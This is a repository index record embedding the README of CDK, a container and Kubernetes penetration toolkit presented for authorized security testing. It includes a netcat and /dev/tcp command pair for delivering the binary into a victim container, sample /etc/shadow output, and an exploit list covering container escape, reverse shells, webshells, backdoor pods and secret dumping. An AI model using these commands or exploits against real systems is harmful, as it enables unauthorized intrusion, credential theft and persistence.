{"id":14975801,"url":"https://github.com/cdk-team/cdk","last_synced_at":"2025-05-15T00:05:20.893Z","repository":{"id":37312599,"uuid":"310247011","full_name":"cdk-team/CDK","owner":"cdk-team","description":"📦  Make security testing of K8s, Docker, and Containerd easier.","archived":false,"fork":false,"pushed_at":"2025-03-08T14:00:06.000Z","size":10005,"stargazers_count":4191,"open_issues_count":15,"forks_count":570,"subscribers_count":73,"default_branch":"main","last_synced_at":"2025-05-15T00:02:52.820Z","etag":null,"topics":["blackhat","cloud-native","cloud-native-security","container","container-escape","container-security","docker","exploits","hacktools","hitb","k8s","k8s-penetration-toolkit","kernel-exploitation","kubernetes","kubernetes-security","linux","penetration","penetration-testing-tools","privilege-escalation","vulnerabilities"],"latest_commit_sha":null,"homepage":"https://github.com/cdk-team/CDK/wiki","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cdk-team.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2020-11-05T09:18:51.000Z","updated_at":"2025-05-13T06:19:13.000Z","dependencies_parsed_at":"2023-11-08T05:53:29.469Z","dependency_job_id":"f288203f-4087-4a17-a249-0093e6293e75","html_url":"https://github.com/cdk-team/CDK","commit_stats":{"total_commits":190,"total_committers":25,"mean_commits":7.6,"dds":0.5526315789473684,"last_synced_commit":"5a9cda1516d4577f738394047d56c4393d04dfda"},"previous_names":["xyntax/cdk"],"tags_count":30,"template":false,"template_full_name":null,"repos
itory_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cdk-team","download_url":"https://codeload.github.com/cdk-team/CDK/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254249198,"owners_count":22039029,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blackhat","cloud-native","cloud-native-security","container","container-escape","container-security","docker","exploits","hacktools","hitb","k8s","k8s-penetration-toolkit","kernel-exploitation","kubernetes","kubernetes-security","linux","penetration","penetration-testing-tools","privilege-escalation","vulnerabilities"],"created_at":"2024-09-24T13:52:38.140Z","updated_at":"2025-05-15T00:05:19.465Z","avatar_url":"https://github.com/cdk-team.png","language":"Go","readme":"\n# CDK - Zero Dependency Container Penetration Toolkit\n\nEnglish | [简体中文](https://github.com/cdk-team/CDK/wiki/CDK-Home-CN)\n\n![png](https://user-images.githubusercontent.com/7868679/177925206-8d83dc95-0f2f-4d61-9a45-0d43b1b0468f.png)\n\n## Legal Disclaimer\n\nUsage of CDK for attacking targets without prior mutual consent is illegal.\nCDK is for security testing purposes only.\n\n## Overview\n\nCDK is an 
open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you escape the container and take over the K8s cluster easily.\n\n## Quick Start\n\nRun **`cdk eva`** to get evaluation info and a recommended exploit, then run **`cdk run`** to start the attack.\n\n```\n\u003e ./cdk eva --full\n\n[*] Maybe you can exploit the *Capabilities* below:\n[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.\n[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.\nCritical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.\nCritical - Possible Privileged Container Found.\n\n\u003e ./cdk run cap-dac-read-search\n\nRunning with target: /etc/shadow, ref: /etc/hostname\nubuntu:$6$*******:19173:0:99999:7:::\nroot:*:18659:0:99999:7:::\ndaemon:*:18659:0:99999:7:::\nbin:*:18659:0:99999:7:::\n```\n\n## Installation/Delivery\n\nDownload the latest release from https://github.com/cdk-team/CDK/releases/\n\nDrop the executable files into the target container and start testing.\n\n### TIPS: Deliver CDK into the target container in real-world penetration testing\n\nIf you have an exploit that can upload a file, then you can upload the CDK binary directly.\n\nIf you have an RCE exploit, but the target container has no `curl` or `wget`, you can use the following method to deliver CDK:\n\n1. First, host the CDK binary on a host with a public IP.\n```\n(on your host)\nnc -lvp 999 \u003c cdk\n```\n\n2. 
Inside the victim container, execute:\n```\ncat \u003c /dev/tcp/(your_public_host_ip)/(port) \u003e cdk\nchmod a+x cdk\n```\n\n## Usage\n```\nUsage:\n  cdk evaluate [--full]\n  cdk run (--list | \u003cexploit\u003e [\u003cargs\u003e...])\n  cdk \u003ctool\u003e [\u003cargs\u003e...]\n\nEvaluate:\n  cdk evaluate                              Gather information to find weakness inside container.\n  cdk evaluate --full                       Enable file scan during information gathering.\n\nExploit:\n  cdk run --list                            List all available exploits.\n  cdk run \u003cexploit\u003e [\u003cargs\u003e...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki\n\nAuto Escape:\n  cdk auto-escape \u003ccmd\u003e                     Escape container in different ways then let target execute \u003ccmd\u003e.\n\nTool:\n  vi \u003cfile\u003e                                 Edit files in container like \"vi\" command.\n  ps                                        Show process information like \"ps -ef\" command.\n  nc [options]                              Create TCP tunnel.\n  ifconfig                                  Show network information.\n  kcurl \u003cpath\u003e (get|post) \u003curi\u003e \u003cdata\u003e      Make request to K8s api-server.\n  ectl \u003cendpoint\u003e get \u003ckey\u003e                 Unauthorized enumeration of ectd keys.\n  ucurl (get|post) \u003csocket\u003e \u003curi\u003e \u003cdata\u003e    Make request to docker unix socket.\n  probe \u003cip\u003e \u003cport\u003e \u003cparallel\u003e \u003ctimeout-ms\u003e TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000\n\nOptions:\n  -h --help     Show this help msg.\n  -v --version  Show version.\n```\n\n## Features\n\nCDK has three modules:\n\n1. Evaluate: gather information inside the container to find potential weaknesses.\n2. Exploit: container escaping, persistence and lateral movement.\n3. 
Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.\n\n### Evaluate Module\n\nUsage\n```\ncdk evaluate [--full]\n```\nThis command will run the scripts below without local file scanning, using `--full` to enable all.\n\n|Tactics|Script|Supported|Usage/Example|\n|---|---|---|---|\n|Information Gathering|OS Basic Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-System-Info)|\n|Information Gathering|Available Capabilities|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities)|\n|Information Gathering|Available Linux Commands|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities)|\n|Information Gathering|Mounts|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Mounts)|\n|Information Gathering|Net Namespace|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Net-Namespace)|\n|Information Gathering|Sensitive ENV|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|\n|Information Gathering|Sensitive Process|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|\n|Information Gathering|Sensitive Local Files|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files)|\n|Information Gathering|Kube-proxy Route Localnet(CVE-2020-8558)|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-check-net.ipv4.conf.all.route_localnet)|\n|Information Gathering|DNS-Based Service Discovery|✔|[link](https://github.com/kubernetes/dns/blob/master/docs/specification.md)|\n|Discovery|K8s Api-server Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server)|\n|Discovery|K8s Service-account Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account)|\n|Discovery|Cloud Provider Metadata API|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API)|\n\n### Exploit Module\n\nList all available exploits:\n```\ncdk run --list\n```\n\nRun targeted exploit:\n```\ncdk run 
\u003cscript-name\u003e [options]\n```\n\n| Tactic               | Technique                                                  | CDK Exploit Name       | Supported | In Thin                                                                    | Doc                                                                                  |\n|----------------------|------------------------------------------------------------|------------------------|-----------|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------|\n| Escaping             | docker-runc CVE-2019-5736                                  | runc-pwn               | ✔         | ✔                                                                          ||\n| Escaping             | containerd-shim CVE-2020-15257                             | shim-pwn               | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn)             |\n| Escaping             | docker.sock PoC (DIND attack)                              | docker-sock-check      | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check)              |\n| Escaping             | docker.sock RCE                                            | docker-sock-pwn        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn)                |\n| Escaping             | Docker API(2375) RCE                                       | docker-api-pwn         | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn)                 |\n| Escaping             | Device Mount Escaping                                      | mount-disk             | ✔  
       | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk)                     |\n| Escaping             | LXCFS Escaping                                             | lxcfs-rw               | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw)                       |\n| Escaping             | Cgroups Escaping                                           | mount-cgroup           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup)                   |\n| Escaping             | Abuse Unprivileged User Namespace Escaping  CVE-2022-0492  | abuse-unpriv-userns    | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-abuse-unpriv-userns)            |\n| Escaping             | Procfs Escaping                                            | mount-procfs           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs)                   |\n| Escaping             | Ptrace Escaping PoC                                        | check-ptrace           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace)                   |\n| Escaping             | Rewrite Cgroup(devices.allow)                              | rewrite-cgroup-devices | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices)         |\n| Escaping             | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | 
cap-dac-read-search    | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)            |\n| Discovery            | K8s Component Probe                                        | service-probe          | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe)                  |\n| Discovery            | Dump Istio Sidecar Meta                                    | istio-check            | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio)                    |\n| Discovery            | Dump K8s Pod Security Policies                             | k8s-psp-dump           | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump)         |\n| Remote Control       | Reverse Shell                                              | reverse-shell          | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell)                  |\n| Remote Control       | Kubelet Exec                                               | kubelet-exec           | ✔         | ✔                                                                          |                  |\n| Credential Access    | Registry BruteForce                                        | registry-brute         | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute) |\n| Credential Access    | Access Key Scanning                                        | ak-leakage             | ✔         | ✔                                                                          | 
[link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage)                     |\n| Credential Access    | Etcd Get K8s Token                                         | etcd-get-k8s-token     | ✔         | ✔                                                                          |                |\n| Credential Access    | Dump K8s Secrets                                           | k8s-secret-dump        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump)                |\n| Credential Access    | Dump K8s Config                                            | k8s-configmap-dump     | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump)             |\n| Privilege Escalation | K8s RBAC Bypass                                            | k8s-get-sa-token       | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token)               |\n| Persistence          | Deploy WebShell                                            | webshell-deploy        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy)                |\n| Persistence          | Deploy Backdoor Pod                                        | k8s-backdoor-daemonset | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset)         |\n| Persistence          | Deploy Shadow K8s api-server                               | k8s-shadow-apiserver   | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver) |\n| Persistence          | K8s MITM Attack 
(CVE-2020-8554)                            | k8s-mitm-clusterip     | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip)            |\n| Persistence          | Deploy K8s CronJob                                         | k8s-cronjob            | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob)                    |\n\n**Note about Thin:** The **thin release** is prepared for short-lived container shells such as serverless functions. We add build tags in the source code and cut a few exploits to make the binary lighter. The 2MB file contains 90% of CDK's functions; you can also pick useful exploits from the CDK source code to build your own lightweight binary.\n\n### Tool Module\n\nRun commands as you would on Linux; the input arguments differ slightly, see the usage link.\n```\ncdk nc [options]\ncdk ps\n```\n\n|Command|Description|Supported|Usage/Example|\n|---|---|---|---|\n|nc|TCP Tunnel|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-nc)|\n|ps|Process Information|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ps)|\n|netstat|Like \"netstat -antup\" command|✔||\n|ifconfig|Network Information|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig)|\n|vi|Edit Files|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-vi)|\n|ectl|Unauthorized enumeration of etcd keys|✔||\n|kcurl|Request to K8s api-server|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-kcurl)|\n|dcurl|Request to Docker HTTP API|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-dcurl)|\n|ucurl|Request to Docker Unix Socket|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ucurl)|\n|rcurl|Request to Docker Registry API|||\n|probe|IP/Port Scanning|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-probe)|\n\n### Release Document\n\nIf you want to know how we released a new version, how 
the thin release is produced, why we provide upx versions, what the differences between the all, normal, thin and upx versions are, and how to choose specific CDK exploits and tools to compile your own release, please check the [Release Document](https://github.com/cdk-team/CDK/wiki/Release).\n\n## Developer Docs\n\n* [Run tests in a container.](https://github.com/cdk-team/CDK/wiki/Run-Test)\n\n## Contributing to CDK\n\nFirst off, thanks for taking the time to contribute!\n\nThanks to the following contributors:\n\n\u003ca href=\"https://github.com/cdk-team/cdk/graphs/contributors\"\u003e\n  \u003cimg src=\"https://contrib.rocks/image?repo=cdk-team/cdk\" /\u003e\n\u003c/a\u003e\n\nMore contributors: [Contributors List](thanks.md)\n\n#### Bug Reporting\n\nBugs are tracked as [GitHub Issues](https://github.com/cdk-team/CDK/issues). Create an issue with the current CDK version, the error message and the environment. Describe the exact steps which reproduce the problem.\n\n#### Suggesting Enhancements\n\nEnhancement suggestions are tracked as [GitHub Discussions](https://github.com/cdk-team/CDK/discussions). 
You can publish any thoughts here to discuss with the developers directly.\n\n#### Pull Requests\n\nFixing problems or maintaining CDK's quality:\n\n* Describe the current CDK version, environment, problem and exact steps that reproduce the problem.\n* Include running screenshots or logs from before and after you fix the problem.\n\nNew features or exploits:\n\n* Explain why this enhancement would be useful to other users.\n* Please enable a sustainable environment for us to review contributions.\n* Include screenshots showing how the new feature works.\n* If you are committing a new evaluate/exploit script, please add a simple doc to your PR message, here is an [example](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy).\n\n## Events\n\n### 404StarLink 2.0 - Galaxy\n![png](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)\n\nProject CDK is now included in 404Team [Starlink Project 2.0](https://github.com/knownsec/404StarLink2.0-Galaxy). Join the StarLink community to get in touch with the CDK dev-team.\n\n- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)\n\n### BlackHat Asia 2021 Arsenal\n\n- [https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422](https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422)\n\n### HITB SecConf 2021 Amsterdam\n\n- [Briefing: \"Attack Cloud Native Kubernetes\"](https://conference.hitb.org/hitbsecconf2021ams/sessions/attacking-cloud-native-kubernetes-with-cdk/)\n\n\n### WHC 2021 (补天白帽大会)\n\n- [CDK: Also a Awesome BugBounty Tool for Cloud Platform](https://github.com/neargle/slidefiles/blob/main/2021%20WHC2021%20CDK-Also-a-Awesome-BugBounty-Tool-for-Cloud-Platform.pptx.pdf)\n\n### KCON 2021 Arsenal\n\n- [http://kcon.knownsec.com/2021/#/arsenal](http://kcon.knownsec.com/2021/#/arsenal)\n\n### Kubernetes Community Days 2021\n\n- 
[https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/](https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/)\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcdk-team%2Fcdk","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcdk-team%2Fcdk","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcdk-team%2Fcdk/lists"}